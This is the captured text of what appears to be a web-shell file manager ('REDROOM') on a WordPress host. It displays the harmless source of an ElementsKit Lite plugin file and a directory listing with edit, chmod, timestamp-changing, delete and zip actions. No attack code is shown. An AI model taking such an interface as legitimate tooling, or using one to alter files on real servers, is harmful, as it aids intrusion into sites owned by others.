REDROOM
PHP 8.0.30
Path:
Logout
Edit File
Size: 1012 B
Close
/home/certprox/test.certproxywizard.com/wp-content/plugins/elementskit-lite/core/build-inline-scripts.php
Text
Base64
<?php namespace ElementsKit_Lite\Core; defined( 'ABSPATH' ) || exit; /** * Inline script registrar. * * Returns all necessary inline js & css. * * @since 1.0.0 * @access public */ class Build_Inline_Scripts { use \ElementsKit_Lite\Traits\Singleton; public function __construct() { // Frontend + Admin scripts add_action( 'wp_print_scripts', array( $this, 'print_inline_script' ) ); } /** * Get common inline JavaScript. * * @return string */ public function common_js() { ob_start(); ?> var elementskit = { resturl: '<?php echo defined( 'ICL_SITEPRESS_VERSION' ) ? esc_url(home_url('/wp-json/elementskit/v1/')) : esc_url(get_rest_url() . 'elementskit/v1/'); ?>', } <?php $output = ob_get_contents(); ob_end_clean(); return $output; } /** * Print inline JavaScript. * * @return void */ public function print_inline_script() { printf( "<script type='text/javascript'>%s</script>", \ElementsKit_Lite\Utils::render( $this->common_js() ) ); } }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 8
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
activation-actions.php
926 B
lrw-r--r--
2026-03-10 10:30:52
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
build-inline-scripts.php
1012 B
lrw-r--r--
2026-03-10 10:30:52
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
build-modules.php
993 B
lrw-r--r--
2026-03-10 10:30:52
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
build-widgets.php
2.62 KB
lrw-r--r--
2026-03-10 10:30:52
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
config-list.php
1.67 KB
lrw-r--r--
2026-03-10 10:30:52
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
editor-promotion.php
2.49 KB
lrw-r--r--
2026-03-10 10:30:52
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
handler-api.php
1.10 KB
lrw-r--r--
2026-03-10 10:30:52
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
handler-widget.php
723 B
lrw-r--r--
2026-03-10 10:30:52
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).